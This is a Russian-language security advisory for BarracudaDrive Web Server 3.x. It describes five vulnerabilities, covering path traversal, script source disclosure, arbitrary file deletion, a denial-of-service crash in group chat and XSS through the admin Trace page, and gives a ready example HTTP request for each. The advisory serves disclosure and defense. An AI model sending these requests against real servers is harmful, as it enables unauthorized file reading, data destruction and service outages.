Программа: BarracudaDrive Web Server 3.x
Найденные уязвимости позволяют удаленному злоумышленнику осуществить DoS
атаку, выполнить XSS нападение, получить доступ к файловой системе и просмотреть
конфиденциальную информацию на целевой системе.
1) Уязвимость возникает из-за ошибки в проверке входных данных при обработке
HTTP запросов. Атакующий может передать специально сформированные HTTP запросы,
что позволит ему получить доступ к произвольным файлам на целевой системе.
Примеры:
http://SERVER/\..\..\..\boot.ini
http://SERVER/%80..\..\..\boot.ini
http://SERVER/%ff..\bdlicense.dat
2) Уязвимость возникает из-за ошибки в проверке входных данных. Атакующий
может добавить "+", "." или другой символ большего значения, чем "0x7f" к имени
файла в запросе, что позволит ему получить исходный код сценариев на сервере
(например, сценариев LUA с расширением .lsp).
Примеры:
http://SERVER/lua.lsp+
http://SERVER/lua.lsp.
http://SERVER/lua.lsp%80
3) Уязвимость возникает из-за ошибки в проверке входных данных. Атакующий
может удалить произвольные файлы и пустые директории на целевой системе.
Примеры:
POST /drive/c/bdusers/USER/?cmd=rm HTTP/1.1
Host: SERVER
Cookie: "use the real user's cookie!"
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
dir=..\..\..\file.txt
4) Уязвимость возникает из-за ошибки разыменования нулевого указателяв Group
Chat функциональности. Атакующий может передать специально сформированные
запросы, содержащие пустой Connection ID, что приведет к краху приложения.
Примеры:
POST /eh/chat.ehintf/C. HTTP/1.1
Host: SERVER
Content-Type: text/plain
Content-Length: 0
Cookie: "use the real user's cookie!"
5) Уязвимость возникает из-за ошибки в проверке входных данных при обработке
HTTP запросов перед использованием данных на странице Trace в интерфейсе
администратора. Атакующий может выполнить произвольный сценарий в браузере
жертвы в контексте безопасности уязвимого сайта, когда будут просмотрены
злонамеренные запросы в log файлах.
Примеры:
GET <script>alert('hello');</script> HTTP/1.0